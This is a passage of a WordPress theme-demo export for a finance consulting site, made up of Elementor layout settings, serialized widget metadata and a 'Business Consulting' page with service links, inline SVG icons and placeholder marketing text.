Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#52C5B6","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#52C5B633"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"a9e257f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4ea034c","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#52C5B6","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#52C5B633"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"f4ad5a2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"70ad7d9","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#52C5B6","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#52C5B633"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2b09e55","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a5a983f","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"bg_box":"#FFFFFF","bg_hover_box":"#52C5B6","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#52C5B633"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d701907","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"52","right":"0","bottom":"55","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"b3a944d","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"4c35005","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"400","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"cab11a6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"27d6af4","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"12e765f","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"f7ba0c1","elType":"section","settings":{"structure":"20","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"gap":"extended","content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cae27a3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"cafb16e","elType":"widget","settings":{"sub":"reliable & safe","title":"Our Strategy Development","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"ce3460e","elType":"widget","settings":{"ot_tabs":[{"tab_title":"Research","tab_content":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"ee4235d"},{"tab_title":"aproach","tab_content":"<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"768bb7a"},{"tab_title":"result","tab_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"3a5c920"}],"title_space":{"unit":"px","size":0,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"40","bottom":"40","left":"0","isLinked":false},"title_width_mobile":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"itabs"},{"id":"6e6c83a","elType":"widget","settings":{"btn_style":"dark","text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false},{"id":"70eb409","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"db0c981","elType":"section","settings":{"layout":"full_width","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"padding":{"unit":"px","top":"50","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"7540ef2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d0b9d6d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home5.png","id":2372},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:1;s:27:"typography_font_size_mobile";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:5:{s:9:"btn_style";i:2;s:4:"text";i:3;s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:15;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:15;s:19:"_inline_size_tablet";i:10;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:3;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:3;s:3:"gap";i:5;s:16:"content_position";i:3;}s:17:"section_structure";a:1:{s:9:"structure";i:5;}}s:5:"style";a:2:{s:18:"section_background";a:8:{s:21:"background_background";i:4;s:16:"background_image";i:3;s:19:"background_position";i:3;s:26:"background_position_mobile";i:1;s:17:"background_repeat";i:3;s:15:"background_size";i:3;s:22:"background_size_tablet";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:7;s:14:"padding_tablet";i:2;s:14:"padding_mobile";i:5;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:8:{s:9:"stitle_bg";i:3;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:28:"stitle_typography_typography";i:3;s:27:"stitle_typography_font_size";i:3;s:12:"stitle_color";i:3;s:29:"stitle_typography_font_weight";i:3;s:11:"title_color";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:2;s:10:"image_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:4;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"align";i:4;s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;s:8:"btn_text";i:4;}}s:5:"style";a:3:{s:17:"style_box_section";a:8:{s:7:"is_line";i:4;s:11:"box_padding";i:4;s:16:"bg_hover_icon_bg";i:4;s:18:"bg_hover_des_color";i:4;s:6:"bg_box";i:4;s:12:"bg_hover_box";i:4;s:19:"bg_hover_icon_color";i:4;s:23:"bg_hover_link_btn_color";i:4;}s:18:"style_icon_section";a:5:{s:9:"is_border";i:4;s:10:"icon_space";i:4;s:9:"icon_size";i:4;s:13:"icon_bg_width";i:4;s:7:"icon_bg";i:4;}s:21:"style_content_section";a:7:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:28:"title_typography_font_weight";i:1;s:9:"des_color";i:4;s:25:"des_typography_typography";i:4;s:26:"des_typography_font_family";i:4;s:24:"des_typography_font_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:5:"itabs";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_tabs";i:1;}}s:5:"style";a:1:{s:11:"style_title";a:2:{s:11:"title_space";i:1;s:18:"title_width_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consulting</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/business-consulting/</link>
		<pubDate>Thu, 17 Sep 2020 08:25:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=977</guid>
		<description></description>
		<content:encoded><![CDATA[<h5>Services</h5>		
					<ul>
							<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										marketing research
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Organizational Audit
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										business consulting
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										project management
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										support functions
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										finance planning
											</a>
									</li>
						</ul>
			<h5>Brochures</h5>		
											<a href="#">
							<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home5.jpg" alt="" loading="lazy" />								</a>
			<h3>Strategic & Tactical Planning</h3>		
		<p>It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.</p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.</p>		
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    